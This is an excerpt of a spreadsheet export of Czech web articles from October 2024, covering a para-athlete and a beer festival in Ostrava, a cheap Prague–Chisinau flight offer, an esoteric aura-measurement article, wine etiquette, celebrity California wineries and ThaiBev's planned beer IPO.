: „Jela jsem na výstaviště se podívat na nějakou výstavu pomůcek pro handicapované, jeřábků na nakládání do auta a podobně. Tam jsem potkala jednu paraatletku, která se mě zeptala, jestli nechci zkusit atletiku.“ Miroslava Obrová, paraatletka : „Když byla paralympiáda v Tokiu před třemi lety, tak už to tam bylo takové na hraně, že bych mohla jet, ale nesplnila jsem nějaké kvóty a tak jsem jet nemohla, ale v tu chvíli mě to nakoplo k tomu, že bych se určitě chtěla někam jet podívat, ať už do Paříže nebo do LA, to mi bylo jedno ale prostě jsem do toho ty 4 roky dávala nejvíc.“ Miroslava Obrová, paraatletka : „Byla jsem na 4 mistrovstvích světa, na mistrovství Evropy , na světových pohárech, nesčetně na závodech, ale tohle bylo zase něco úplně jiného. Ty závody, co jsem jezdila doposud byly vždy pouze atletické, tak znám pouze ty handicapované atlety. A když vidíte, že střílí lukem nohama, plavci plavou ber ruk, to mi tady v té atletice takové handicapy nemáme, takže to bylo takové, že člověk přišel zase do úplně jiného světa a řekl si, že na tom vlastně ještě není tak špatně, protože ty handicapy jsou různé. No a ta atmosféra 80 tisíc lidí, nabitý stadion, lidi jásali, řvali, fandili, to si nikdo nedokáže představit tu atmosféru.“ Radim Ivan ( ODS ), místostarosta MOb Ostrava-Jih : „Já obdivuju všechny tyhle lidi, protože se i přes ten handicap do něčeho vrhnou. Tady s paní jsme se bavili, že do toho vletěla až někdy v 38 letech, našla nový smysl života a to je skvělé a myslím si, že jako společnost bychom měli tyto sportovce nějakým způsobem podporovat a velké poděkování patří i klubu SSK Vítkovice, že se těmto sportovcům věnují.“ Zábřežský zámek už po sedmnácté hostil Svatováclavské slavnosti piva . Účastníci akce měli možnost vyzkoušet piva z 30ti českých mini-pivovarů. Program byl doplněn také o hry a zábavu pro děti, hudební kapely a charitativní čepování. Gabriela Gödelová, ředitelka Kulturního zařízení Ostrava-Jih : „Věřím, že každoročně trochu zvedáme tu úroveň, jak z hlediska programu, tak z hlediska nabídky těch minipivovarů. Těch je tu mimochodem 30 a ta nabídka je opravdu pestrá a je těžké si vybrat.“ Roman Puchálka, Minipivovar Beerokracie : „Máme určitě nějaké ovocné piva , které jsou spíš pro dámy, ale pánové si taky dají. Máme hodně dobrou sezónní jipu a klasický hořký ležák.“ René Binar, Minipivovar Slezan : „Máme 18 Svatováclavský speciál, který zraje tři měsíce, máme zázvorové, máme spodně kvašenou citru, takže každý si musí najít svoje.“ anketa, návštěvníci akce : „Zatím jsme ochutnali ze starobělského pivovaru ležák, ten je výborný, protože jsem tam byl i na exkurzi, tak vím do čeho jdu a předtím jsme zkusili z karlovického pivovaru z Velkých Karlovic , a tak taky měli úžasné pivo , takže můžu doporučit.“ anketa, návštěvníci akce : „Já tomu vůbec nerozumím, ale nechávám se vést zkušenějším a je to docela zajímavé. Měli jsme jen 2 piva , tak zatím to nedokážu posoudit, ale je to dobré.“ Klára Šídlová, pedagožka, Středisko volného času Ostrava - Zábřeh : „Dneska jsme si ve spolupráci s kulturou Ostrava -Jih připravili stanoviště, máme tady air-brush tetování, což je tetování nástřikem, které dětem vydrží 3-10 dnů. Dále máme papírové dílničky, kde si děti vyrábí koníky, princezny prince a veškeré dobové věci ke sv. Václavu, malování na obličej a také dřevěné hry nebo fotokoutek pro děti i dospělé.“ Gabriela Gödelová, ředitelka Kulturního zařízení Ostrava-Jih : „Kromě toho, že se tady lidé dneska přišli bavit, tak je to také o pomoci, jako vždy tady máme sbírku – navazujeme na akci Běh pro a letos vybíráme peníze a čepujeme pivo za dobrovolnou cenu pro Isabelku, která je tady z Jihu a potřebuje peníze na rekonvalescenci a fyzioterapii a kromě toho v návaznosti na ty nešťastné události minulých dnů, jsme se rozhodli dát také sbírku na naše sousedy z Nové Vsi, kteří potřebují finančně podpořit, aby si mohli opravit své obydlí zničené povodněmi.“ Autor: POLAR televize Ostrava Rubrika transition_slide News</t>
  </si>
  <si>
    <t>2640</t>
  </si>
  <si>
    <t>20241001_92_2995795471_6345686cbc19d84bb173.html</t>
  </si>
  <si>
    <t>6345686cbc19d84bb173</t>
  </si>
  <si>
    <t>Z Prahy do Moldavska: akční letenky do Kišiněva od FlyOne za 961 Kč</t>
  </si>
  <si>
    <t>Z Prahy do Moldavska : akční letenky do Kišiněva od FlyOne za 961 Kč Z Prahy do Moldavska : akční letenky do Kišiněva od FlyOne 961 Kč O této nabídce Pěknou promo akci dnes zveřejnila moldavská letecká společnost FlyOne (platí i na lety její dceřiné společnosti z Arménie ). Neváhej a ulov si extrémně levné letenky právě do Moldavska , jedné z turisticky nejvíce opomíjených zemí na evropském kontinentu. Zpáteční letenky z Prahy (PRG) do tamějšího hlavního města, Kišiněva (RMO), tě vyjdou na pouhých 961 Kč! Linka mezi českou a moldavskou metropolí bude během zimního letového řádu v provozu 2× týdně (vždy ve čtvrtek dopoledne a v neděli ráno). To přímo vybízí k podzimním či zimním plánům na prodloužený výlet v Moldavsku . Jedná se o raritní promo, jelikož dopravce podobné akce příliš často nepublikuje. Kampaň probíhá od 1. do 10. října 2024 a vztahuje se na letenky zakoupené v termínech od 27. října 2024 do 29. března 2025. Za akční cenu 19 € / směr je dostupné velké množství letenek napříč sítí dopravců (s výjimkou letenek do Dubaje a egyptských letovisek). Veškeré informace o letišti v Kišiněvu (RMO), vč. tipů na dopravu z letiště do centra města, nalezneš v našem průvodci. Rezervuj: přes stránky letecké společnosti Fly One Zavazadla: malý příručák á 40 × 30 × 20 cm Dostupnost: listopad 2024 – březen 2025 Příkladové termíny: 14. – 17. 11. za 961 Kč 12. – 15. 12. za 961 Kč 16. – 19. 1. za 961 Kč 13. – 16. 2. za 961 Kč TIP: Míříš-li na odletové letiště vlastním autem, určitě ti přijde vhod podrobný průvodce parkováním na Letišti Praha . Zaleťsi na výlet do Moldavska Moldavsko je nejchudší a zároveň nejméně navštěvovanou zemí Evropy – i to ale může být důvodem, proč se sem vydat. Moldavská města, vesnice i krajina jsou stále naprosto autentické, bez taháků na turisty a plné vřelých, pohostinných lidí. Staň se cestovatelským pionýrem a poznej panenskou moldavskou přírodu, poutavou kulturu a výborné víno . Navštiv vinařství Cricova a ochutnej místní produkci. Obdivuj rozdílnost oprýskaných socialistických budov střídajících se s nádechem pařížských bulvárů, zavítej do Národního muzea umění a v některém z místních restaurantů si objednej kyselou polévku zama a jako hlavní chod pak populární džuveč – jehněčí maso dušené s mrkví, paprikou a další zeleninou. Moldavsko si zamiluješ a rád se sem budeš vracet. Ubytování Při hledání střechy nad hlavou kdekoliv ve světě se můžeš jednoduše spolehnout na Booking (rezervací přes tento odkaz podpoříš náš web, ale cena pro tebe zůstane stejná) či AirBnB. Pokud tvoje cesta není v nejbližších týdnech, raději ti doporučíme bookovat ubytko s možností bezplatného storna. Mrkni se na bohatou nabídku ubytování v Kišiněvu . Podívej se také na nejširší nabídku ubytování v celém Moldavsku . Autopůjčovna Chystáš-li se procestovat kus země, nebude lepšího nápadu, než si půjčit vlastní auťák přímo na letišti. Mrkni se do naší autopůjčovny a udělej si přehled o dostupných vozech. Pronájem auťáku na prodloužený víkend (tj. tři dny) tě vyjde na Náhled letenky z Prahy do Kišiněva za 961 Kč Bude se hodit Autor: Antonin</t>
  </si>
  <si>
    <t>6440</t>
  </si>
  <si>
    <t>8410</t>
  </si>
  <si>
    <t>20241001_93_2995936777_a6f129e1529714e8fdf4.html</t>
  </si>
  <si>
    <t>a6f129e1529714e8fdf4</t>
  </si>
  <si>
    <t>Jak jsem potkal auru</t>
  </si>
  <si>
    <t>Jak jsem potkal auru úterý 1. říjen 2024 16:34 Autor 2670 Jak jsem potkal auru /content_page/222-esoterika-a-vira/2670-jak-jsem-potkal-auru.html Klikněte pro přidání Esoterika a víra | Archiv časopisu | 2014 O auře toho bylo již napsáno mnoho. Rád bych se s vámi podělil o to, kterak jsem k jejímu pozorování přišel já. Po několika nezdařených pokusech přimět mne k nějakému sebevzdělávání v oblasti sebepoznání, ezoteriky a dalších nemateriálních věd, se mé milované ženě nakonec přece jen podařilo zapálit jiskru zvědavosti v mém srdci. Pod záminkou společně strávených chvil a osobního růstu, jsme vyrazili na společný seminář. Při ukázkových ochutnávkách z dílny astrologické, meditační, rodinně konstelační a dalších, jsme se dostali i k ukázce měření aury. To mne jako technika natolik zaujalo, že jsem začal zkoumat celý systém detailněji. Jak to vlastně funguje? Vrtalo mi to hlavou a tak jsme společně se ženou záhy po proběhlém semináři zabrouzdali na "síti" a našli několik center, kde se měření aury provádí. V rámci hesla důvěřuj, ale prověřuj, jsme nakonec vybrali tři způsoby měření a vydali se na týdenní cestu po "auroměřičích" českých i slovenských. Přístroje a jejich principy byly vesměs hodně podobné, ale výstupy nás přesvědčily jen u jednoho systému. Byl zajímavý tím, že člověk nemusí do měření zasahovat a svým úhlem pohledu jej komentovat, či upravovat a vysvětlovat a tím samozřejmě neúmyslně zkreslovat. Přístroj, který se nám líbil nejvíce, jsme nakonec objednali v Americe . Osobně mě zaujalo to, že přístroj měří prostřednictvím senzoru, který snímá v organizmu zpětnou biologickou vazbou určené hodnoty, jež pak vyhodnocuje a přiřazuje jim zajímavé informace o jeho těle, mysli, duši, energii, hodnotě stresu nebo vyrovnanosti? zkrátka vyhodnotí energeticko-emočním stav. Zároveň dokáže vyvodit z naměřených dat i celkem slušný závěr ve formě reportu, kde je vše logicky, jednoduše a přehledně popsáno. Dokonce obsahuje i psychologický rozbor osobnosti. A to je opravdu zajímavé? to, co si nechceme vůbec připustit, najednou vidíme černé na bílém. Najednou neplatí žádné výmluvy, lhaní ani kličky? Když jsem si poprvé změřil auru, po přečtení reportu "jsem se sebou týden nemluvil". Nechtěl jsem přijmout informace, které jsem dostal. Až při několikátém přečtení a opadnutí prvotních odmítavých emocí, jsem začal připouštět, že by to až zas takový blábol nemusel být a teprve další a další čtení mne ujistilo v tom, že jsem začal své skryté vlastnosti objevovat a pojmenovávat. To jsem se o sobě ale dozvěděl věcí? Teprve přijetí těchto informací mi pomohlo najít cestu a přijmout se takový jaký jsem. S odstupem času mohu říci, že to pro mne bylo velké plus. Pravdivé informace Zpočátku jsme si nebyli jisti, zda měření opravdu přináší relevantní informace. Když odcházeli první známí, kteří si nechali auru změřit, říkali, že se jich to vůbec netýká, že to je o někom jiném atd? Většinou ale trvalo tak týden, kdy přišli zpět a ptali se nás, s překvapeným výrazem, jak je možné, že o nich tak dokonale všechno víme. Popis z reportu totiž seděl úplně přesně. Ze stavu stavu aury (velká, malá, rovnoměrná, nevyvážená, harmonická, neharmonická apod.) se dá vyčíst mnoho. Další informace přináší barvy aury, jejich sytost, intenzita. V přeneseném smyslu se jedná o energii? základní výbavu člověka pro zvládnutí úkolů v určité fázi hmotného bytí. Z aury se dá vyčíst i stav čaker? jejich nabití, harmonie, činnost. Dále informace o rovnováze jin a jang energií? tedy vztah mezi vnitřním mužem a ženou, vztah mezi dáváním a přijímáním atd. To byly a jsou pro většinu naprosto překvapující informace. A přitom jsou změřeny a vyhodnoceny "obyčejným materiálním měřákem". Ohromující, zvláště pak pro ty více materiálně zaměřené, je psychologický rozbor osobnosti. Dokonalé na celém systému měření aury je, že na jeho přípravě se podílely jak složky vědecké, tak i ezoterické. Vědci se spojili se senzibily, a když člověk vidící auru svým zrakem řekl, že ji vidí v té a té barvě, velikosti, tvaru a vědec? fyzik odečetl hodnoty z měřicího přístroje, vědec psycholog položil otázku, vědec psychiatr položil otázku a tak vznikla velká spousta dat, která při měřeních na amerických universitách za dobu 20 let přinesla tolik informací, že je bylo možno zapracovat do programu, který dokáže naměřeným hodnotám rovnou přiřadit informace o okamžitém energeticko-emočním stavu těla, mysli a duše a i mnohé další. Postupem času jsme se i my naučili z reportu zjišťovat další a další informace, které mají velikou vypovídací hodnotu o člověku samém a nejsou na první pohled zřejmé, mají však své souvislosti a zákonitosti. Systém měření aury tak používáme i pro "nevěřící Tomáše", kteří potom třeba na základě množství informací najednou začnou věřit? No a co vlastně měření aury přineslo mě? Inu informace především o mně samotném. Nikdy nepotkávám na své cestě nikoho náhodou. Vždy přijde ta pravá osoba, která mi něco pomůže ukázat a odkrýt. Když se mě něco dotkne natolik, že mi skoro až "harmonie vystříkne", je to ten pravý okamžik poděkovat andělovi, který mi něco ukazuje, který mě inspiruje. Nevím, jak to mají ostatní, neví to ani přístroj ani systém měření aury. Pro mě bylo měření aury velice přínosné. Jisté je jen to, že aura o nás prozradí mnohé. Je to přeci jen energie a tou je, jak se zdá, tady u nás na Zemi úplně vše. Je to pomocník k tomu, abychom si sami uvědomili, jak to vlastně máme, jak to se sebou "koulíme". A když už si lžeme, tak je to taková malinká výzva k tomu, abychom si sami nalili čistého vína . Vždyť je to "jen" měření elektrických, tedy energetických hodnot. Ale ty výsledky stojí za to! Budete-li se chtít dozvědět více o své auře a tedy i o sobě, můžete se přijít nechat změřit. Je to bezbolestné. Pravidelně býváme jednou měsíčně celý den v Praze v knihkupectví U Džoudyho, nebo můžete přijet k nám do Liberce do centra HAJIRU po předchozí telefonické objednávce. Tel.: +420 774 232 232, nebo www.hajiru.cz. Jiří Rakušan centrum Hajiru Liberec Tento článek byl zveřejněn v tištěném časopise Phoenix 10/2014. Nahoru © 2024 PHOENIX On-line e-magazín PHOENIX On-line provozuje a spravuje Ambro Systems spol. s r.o. ve spolupráci s časopisem PHOENIX Redakce si vyhrazuje právo příspěvky krátit a upravovat při zachování obsahu sdělení. Příspěvky vyjadřují názory dopisovatelů a nemusí být totožné s názory redakce. Redakce nenese odpovědnost za škody vzniklé v souvislosti s praktickým používáním zde zveřejněných informací. Kopírování a publikace zveřejněných textů a fotografií je možná pouze s písemným souhlasem Ambro Systems spol. s r.o. Autor: Jiří Rakušan Autor person Jiří Rakušan</t>
  </si>
  <si>
    <t>60</t>
  </si>
  <si>
    <t>64</t>
  </si>
  <si>
    <t>20241001_94_2995709972_746153f5b40776a0a81e.html</t>
  </si>
  <si>
    <t>746153f5b40776a0a81e</t>
  </si>
  <si>
    <t>Jak na správné popíjení vína radí etiketa. I malé detaily dělají velký dojem</t>
  </si>
  <si>
    <t>Jak na správné popíjení vína radí etiketa. I malé detaily dělají velký dojem Pravidla etikety nám někdy mohou přijít přehnaná. Pravdou však je, že jejich dodržování je ve společnosti ceněno, leckdy přímo vyžadováno. Je tedy na čase odhodit předsudky o případné trapnosti a ponořit se do elegantních vzorců, které nám etiketa nabízí. Naučte se třeba, jak se správně chovat v přítomnosti sklenice na víno . Všichni jsme slyšeli o slušném otevírání dveří či vhodném nabízení tykání. Pravidla etikety však zasahují do každodenního života častěji, než byste si mysleli. Určují pravidla oblékání, dávání dárků i chování v restauraci. Moderní etiketa navíc nabízí čerstvý pohled, nemusíte se tedy obávat zastaralých příkazů. Věděli jste třeba, že i držení sklenky na alkohol má své zásady? Etiketa myslí na vše. Barva vína vám určí správný úchop sklenice Sklenic na alkoholické nápoje existuje mnoho. Nejvíce pravidel týkajících se jejich držení má ale zcela určitě ta na víno . Hlavním doporučením je, abyste ji nikdy nedrželi za její tělo. Je tomu tak jednak z důvodu estetična, jelikož se nehodí mít sklenici ohmatanou. Důležitým aspektem je ale rovněž teplota vína . Při držení za stopku si totiž tekutinu nezahříváte vlastním dotykem. Právě úchop sklenice za stopku má hned několik úrovní, rovněž se odvíjejících od teploty vína . Čím se víno podává vychlazenější, tím níž sklenici držíme. Perlivé víno , nalévané do takzvané flétny, držíme úplně nejníž, u paty sklenice. Víno bílé a růžové chytneme zase za spodní část stopky. Oproti tomu víno červené, které bývá mírně nachlazené, držíme nahoře, u buclaté části sklenice. Kdy se hodí říct „Na zdraví!“ a kdy raději nepřiťukávejte Nedílnou součástí popíjení vína je pochopitelně i symbolické přiťuknutí. Má být decentní, nikoliv horlivé a hlasité. Nezapomeňte také na oční kontakt. Výjimkou je podzimní burčák, se kterým se nepřiťukává. Až se rozhodnete vína napít, dělejte tak v přiměřených doušcích. Ideálně byste se měli snažit držet přibližně stejné tempo pití jako ostatní v kolektivu. Samozřejmě v limitu svých možností. Zdroj: Pexels Pokud se účastníte degustace, je vhodné se o pravidlech informovat hlouběji. Jedním z nich je například umírněnost použití parfému . Raději se zcela vyhněte silným vůním, ať nekazíte odhalování chutí při popíjení. Další pravidlo, které se hodí dodržovat i mimo degustace, radí, že bychom měli mít před konzumací vína čistá ústa a ideálně pít ze stejného místa na sklenici. Důvod je opět estetický. Pozor, koňakem se neťuká. Sklenici si ale můžete posadit do dlaně Na rozdíl od vína nemají ostatní druhy alkoholových nápojů tak přísná pravidla. Míchané drinky se podávají v různých zajímavých nádobách, tvrdý alkohol pak v nižších sklenicích se silným dnem. Výjimku tvoří takzvané napoleonky, tedy sklenice, ze kterých se většinou pije koňak či likér. Při konzumaci je držíme za buclaté tělo a neťukáme s nimi. Zobrazit příspěvek na Instagramu Příspěvek sdílený Wine Enthusiast (@wineenthusiast) Etiketu je dobré brát jako návod, jak ze společenských akcí získat maximum. Schválně se stavět proti zavedeným pravidlům není většinou cesta, která by dělala milý první dojem. Za drobné chyby vám nikdo hlavu neutrhne. Čas od času může být ale vzdělání v této oblasti příjemným způsobem, jak si život romantizovat a cítit se jako hodnotný člen společnosti. Zdroje : Youtube, Pexels, Instagram Autor článku: Anita Hofmannová #etiketa #koktejl #pravidla #sklenička #společnost #víno Foto: Pixabay Jak na správné popíjení vína radí etiketa. I malé detaily dělají velký dojem Autor článku: Anita Hofmannová 1. 10. 2024 Pravidla etikety nám někdy mohou přijít přehnaná. Pravdou však je, že jejich dodržování je ve společnosti ceněno, leckdy přímo vyžadováno. Je tedy na čase odhodit předsudky o případné trapnosti a ponořit se do elegantních vzorců, které nám etiketa nabízí. Naučte se třeba, jak se správně chovat v přítomnosti sklenice na víno . - Reklama - Všichni jsme slyšeli o slušném otevírání dveří či vhodném nabízení tykání. Pravidla etikety však zasahují do každodenního života častěji, než byste si mysleli. Určují pravidla oblékání, dávání dárků i chování v restauraci. Moderní etiketa navíc nabízí čerstvý pohled, nemusíte se tedy obávat zastaralých příkazů. Věděli jste třeba, že i držení sklenky na alkohol má své zásady? Etiketa myslí na vše. Barva vína vám určí správný úchop sklenice Sklenic na alkoholické nápoje existuje mnoho. Nejvíce pravidel týkajících se jejich držení má ale zcela určitě ta na víno . Hlavním doporučením je, abyste ji nikdy nedrželi za její tělo. Je tomu tak jednak z důvodu estetična, jelikož se nehodí mít sklenici ohmatanou. Důležitým aspektem je ale rovněž teplota vína . Při držení za stopku si totiž tekutinu nezahříváte vlastním dotykem. Právě úchop sklenice za stopku má hned několik úrovní, rovněž se odvíjejících od teploty vína . Čím se víno podává vychlazenější, tím níž sklenici držíme. Perlivé víno , nalévané do takzvané flétny, držíme úplně nejníž, u paty sklenice. Víno bílé a růžové chytneme zase za spodní část stopky. Oproti tomu víno červené, které bývá mírně nachlazené, držíme nahoře, u buclaté části sklenice. - Reklama - Kdy se hodí říct „Na zdraví!“ a kdy raději nepřiťukávejte Nedílnou součástí popíjení vína je pochopitelně i symbolické přiťuknutí. Má být decentní, nikoliv horlivé a hlasité. Nezapomeňte také na oční kontakt. Výjimkou je podzimní burčák, se kterým se nepřiťukává. Až se rozhodnete vína napít, dělejte tak v přiměřených doušcích. Ideálně byste se měli snažit držet přibližně stejné tempo pití jako ostatní v kolektivu. Samozřejmě v limitu svých možností. Zdroj: Pexels Pokud se účastníte degustace, je vhodné se o pravidlech informovat hlouběji. Jedním z nich je například umírněnost použití parfému . Raději se zcela vyhněte silným vůním, ať nekazíte odhalování chutí při popíjení. Další pravidlo, které se hodí dodržovat i mimo degustace, radí, že bychom měli mít před konzumací vína čistá ústa a ideálně pít ze stejného místa na sklenici. Důvod je opět estetický. Pozor, koňakem se neťuká. Sklenici si ale můžete posadit do dlaně Na rozdíl od vína nemají ostatní druhy alkoholových nápojů tak přísná pravidla. Míchané drinky se podávají v různých zajímavých nádobách, tvrdý alkohol pak v nižších sklenicích se silným dnem. Výjimku tvoří takzvané napoleonky, tedy sklenice, ze kterých se většinou pije koňak či likér. Při konzumaci je držíme za buclaté tělo a neťukáme s nimi. Zobrazit příspěvek na Instagramu Příspěvek sdílený Wine Enthusiast (@wineenthusiast) Etiketu je dobré brát jako návod, jak ze společenských akcí získat maximum. Schválně se stavět proti zavedeným pravidlům není většinou cesta, která by dělala milý první dojem. Za drobné chyby vám nikdo hlavu neutrhne. Čas od času může být ale vzdělání v této oblasti příjemným způsobem, jak si život romantizovat a cítit se jako hodnotný člen společnosti. Zdroje : Youtube, Pexels, Instagram Autor článku: Anita Hofmannová #etiketa #koktejl #pravidla #sklenička #společnost #víno Autor: Anita Hofmannová Autor person Anita Hofmannová Rubrika transition_slide KNOW HOW WOW</t>
  </si>
  <si>
    <t>584</t>
  </si>
  <si>
    <t>20.52</t>
  </si>
  <si>
    <t>20241001_95_2995622666_d37a1d2ef3acbdd731d5.html</t>
  </si>
  <si>
    <t>d37a1d2ef3acbdd731d5</t>
  </si>
  <si>
    <t>Pink, John Legend i Coppolovi: Celebrity, které vyrábějí víno v Kalifornii</t>
  </si>
  <si>
    <t>Pink, John Legend i Coppolovi : Celebrity, které vyrábějí víno v Kalifornii Romana Schützová 1. 10. 2024 Nejenom Evropa je kontinentem zaslíbeným pěstování vynikajících vín. Co se týče USA , ta ta nejlepší vína tam vznikají v Kalifornii . Které slavné osobnosti podlehly podnikání v produkci vína na západě Spojených států ? Pink: Santa Barbara, Kalifornie Foto: Instagram @twowolveswine Pink Trojnásobná držitelka Grammy, ekologická aktivistka a ochránkyně lidských i zvířecích práv, se svěřila: „Vždy jsem byla snílek. Věřím, že všechno je možné. Mezi dvaceti a třiceti jsem hodně cestovala. Nejlepší vzpomínky mám na chvíle, kdy jsem u lahve vína poznávala nové přátele. Později jsem ráda podnikala výpravy do vinařských oblastí po celém světě: francouzské Bordeaux, Austrálie , údolí Napa, Jižní Afrika , Paso Robles, tam všude jsem byla. Při každé cestě jsem při tom studovala odrůdu nebo styl vína , který v dané oblasti vévodí. Po letech fantazírování a výrobě nepoživatelných demižonů jsem se nakonec s rodinou sbalila a opustili jsme město. Našli jsme si organickou vinici v okrese Santa Barbara v Kalifornii . Vyráběli jsme víno v naší garáži. Nejvíc mě ale chytla samotná péče o úrodu. Prořezávání větví je nejlepší způsob, jak poslouchat nové album od začátku do konce. Je to ta nejtěžší práce, jakou jsem kdy dělala mimo koncertování.“ Pink svá vína pojmenovala Two Wolves. Zaujala ji totiž dávná indiánská legenda o dvou vlcích, kteří přebývají v lidských tělech. Jeden zlý představuje hněv, závist, smutek, lítost, chamtivost, aroganci, sebelítost, vinu, zášť, pocit méněcennosti, lež, pýchu, nadřazenost a nehorázně vysoké ego. Naopak druhý vlk je dobrý – ztělesňuje radost, pokoj, lásku, naději, vyrovnanost, pokoru, laskavost, shovívavost, empatii, štědrost, pravdu, soucit a víru. Který vlk vyhraje? Odpověď je jednoduchá: Ten, kterého krmíme. Pink v sobě krmí dobrého vlka a dbá na to, aby zrání vína probíhalo ekologicky, i sklizeň musí být co nejšetrnější. Odměnou jí (i jejím zákazníkům) je vynikající víno ! John Legend: Napa Valley, Kalifornie Foto: Instagram @lve_wines John Legend „Mít vlastní vinici byl můj dávný sen,“ nechal se slyšet John Legend, zpěvák, textař, herec a nositel devíti cen Grammy. Víno pěstuje v kalifornském údolí Napa, kde na zhruba 170 kilometrech čtverečních najdete více než 400 vinařství. Tamní vína jsou považována za nejlepší na světě. Není divu, údolí disponuje ideálním mikroklimatem pro pěstování mnoha odrůd vín původem převážně z Itálie , Francie a Německa . Kromě toho, že se tu vsází na udržitelné vinařství, jde o jednu z nejdynamičtějších a nejluxusnějších vinařských destinací vůbec. Ve spolupráci s vinařem jménem Jean -Charles Boisset tu John Legend vyrábí vynikající víno červené, bílé, rosé i sekty. Vinná réva zraje na pozemcích Raymond Vineyards. Zdejší vína jsou skvěle vyvážená v jemnosti, síle a komplexnosti už přes čtyřicet let! A sbírají prestižní ocenění. Stačí jen ochutnat! Francis Ford Coppola: Geyserville, Kalifornie Foto: Instagram @coppolawine Francis Ford Coppola „Nápad na vlastní vinařství jsem od začátku spojil s říší divů. Chtěl jsem, aby šlo o místo, kde lidé budou oslavovat lásku k životu,“ řekl Francis Ford Coppola , slavný scenárista, režisér a producent, který za svoji filmovou ságr Kmotr obdržel pět Oscarů a tři Zlaté glóby. Ten samý muž sbíral vinařské zkušenosti celých třiatřicet let. V roce 2008 zakoupil vinařství plné terasovitých políček nacházející se na úbočí kopců, aby ho celé zrekonstruoval. A tak se zrodilo Francis Ford Coppola Winery. Na ploše čítající přes 600 hektarů zraje celá řada ušlechtilých odrůd, avšak právě místní Cabernet patří k nejlepším na světě! Mezi dalšími oceněnými víny na sebe upozorňuje diamantová kolekce, svěží sekty Sofia i exkluzivní vína z limitované produkce Francis Coppola Reserve. „Abyste stvořili klasiku, chce to vášeň,“ zní heslo legendárního filmaře. Jeho vinařství najdete na Via Archimedes v kalifornském Geyserville v okrese Sonoma . Na pozemku stojí kromě vinařství i restaurace, dva bazény a zahrát si tu můžete pétanque. Dokonce si tu můžete uspořádat svatbu. Kurt Russell : Santa Rita Hills, Kalifornie Foto: Instagram @gogiwines Kurt Russell Herec Kurt Russell přiznal, že jeho románek s vínem začal před mnoha lety během cyklovýletů s Goldie Hawn , při kterých poznávali velké vinařské oblasti ve Francii , Itálii a Kalifornii . Měl tak možnost ochutnat mnoho skvělých vín. „Ta vína mi nejen ukradla chuť, ale i srdce. Netrvalo dlouho a zrodil se sen začít vyrábět vlastní vína . Hodně jsem o tom mluvil s vinaři a producenty od Burgundska , Bordeaux a Toskánsko až po údolí Napa . Když mi pak jeden dobrý přítel řekl:,Kurte, nemáš jen sen, máš vášeň a měl bys za ní jít,´pomohlo mi to skočit ze snu do reality.“ Vinice Ampelos na svazích Santa Rita funguje na principech biodynamického zemědělství. Jeho Chardonnay leží v sudech 18 měsíců, jiné odrůdy až 22 měsíců. „Miluju, když společně s přáteli popíjíme víno pod velkým dubem a pozorujeme západ slunce nad vinicí,“ říká Kurt Russell , který je pyšný na to, že vína odrůd Pinot Noir a Chardonnay z jeho vinice jsou ověnčené spoustou mezinárodních cen. Mimochodem, byl to právě jeho nápad nechat vytisknout na zadní etiketu každé lahve nápis „Pro vaše potěšení“. Autor: Romana Schützová Autor person Romana Schützová</t>
  </si>
  <si>
    <t>15840</t>
  </si>
  <si>
    <t>7110</t>
  </si>
  <si>
    <t>20241001_96_2995604710_1cca5d1bfb585b4da892.html</t>
  </si>
  <si>
    <t>1cca5d1bfb585b4da892</t>
  </si>
  <si>
    <t>ThaiBev oživuje plán na IPO pivní divize a hledá potenciální partnery</t>
  </si>
  <si>
    <t>ThaiBev oživuje plán na IPO pivní divize a hledá potenciální partnery Chci využít příležitost a investovat Chci získat více informací Klíčové body Thai Beverage obnovuje plány na IPO pivní divize BeerCo díky příznivým tržním podmínkám Firma zvažuje zapojení kapitálového partnera pro posílení růstu IPO pivní divize má prioritu před možným IPO lihovin v Singapuru Pivní divize BeerCo vykázala 10,2% růst EBITDA, což potvrzuje její potenciál Thai Beverage Pcl, jedna z největších asijských nápojářských společností, obnovuje své plány na uvedení své pivní divize BeerCo na burzu. Tento krok přichází v době, kdy globální akciové trhy zažívají významnou rally, což vytváří příznivé podmínky pro primární veřejnou nabídku akcií (IPO) . Společnost rovněž uvažuje o zapojení kapitálového partnera, což by mohlo podpořit růstovou trajektorii a zajistit větší stabilitu pro budoucí expanzi. O obnovení plánů na IPO informoval Michael Chye, šéf skupiny pivních produktů ThaiBev, během setkání s novináři v thajském hlavním městě Bangkoku . Podle jeho slov by IPO mohlo proběhnout již ve třetím čtvrtletí příštího roku, za předpokladu, že se podaří dojednat specifika prodeje akcií do konce letošního roku. Tento časový rámec závisí na dalších faktorech, včetně tržních podmínek a případné dohody s potenciálními partnery. Obnovení plánů na IPO přichází dva roky poté, co společnost ThaiBev, pod vedením thajského miliardáře Charoena Sirivadhanabhakdiho, pozastavila původní plány kvůli nepříznivým tržním podmínkám. V té době se firma pokoušela získat prostřednictvím IPO až 1 miliardu USD, avšak slabé akciové trhy přiměly vedení k pozastavení tohoto kroku. Dnes se však situace změnila. Globální akciové trhy zaznamenávají růst, centrální banky po celém světě uvolňují měnovou politiku a snižují úrokové sazby, což zvyšuje atraktivitu pro investory. Zdroj: Getty Images „Úrokové sazby celosvětově klesají a akciové trhy opět silně stoupají. Proto jsme se rozhodli znovu zvážit možnost IPO. O konečném rozhodnutí bychom mohli rozhodnout během několika měsíců,“ řekl Chye. Zájem o IPO společnosti BeerCo je výrazný nejen mezi investory, ale také mezi potenciálními partnery. Výkonný ředitel ThaiBev, Thapana Sirivadhanabhakdi, potvrdil, že firma jedná se dvěma možnými partnery, kteří by se mohli zapojit do pivní divize. I když Sirivadhanabhakdi potvrdil plány na IPO, zdržel se komentáře ohledně toho, zda bude mít BeerCo kapitálového partnera, pokud prodej akcií proběhne podle plánu. ThaiBev rovněž zvažuje možnosti, jak diverzifikovat své portfolio a využít dalších příležitostí na trzích. Již dříve se objevily spekulace, že společnost plánuje IPO své divize lihovin v Singapuru . První rozhovory s bankami naznačily, že by mohlo dojít k prodeji podílu ve výrobci thajských likérů, jako jsou Mekhong a Ruang Khao. Přesto se zdá, že prioritou pro vedení společnosti zůstává pivní divize. Podle prezidenta a šéfa divize lihovin společnosti ThaiBev, Prapakona Thongtheppairota, má IPO pivní divize přednost, protože může připravit půdu pro budoucí rozvoj dalších částí společnosti. „Plány na IPO pivní divize jsou pro nás prioritou. Věříme, že to bude klíčový krok pro další růst společnosti a přípravu na možné uvedení dalších divizí na burzu,“ uvedl Thongtheppairot. Zdroj: Getty Images Ekonomické výsledky ThaiBev za uplynulých devět měsíců, které skončily v červnu letošního roku, ukazují stabilitu společnosti. Tržby se oproti předchozímu roku příliš nezměnily a činily 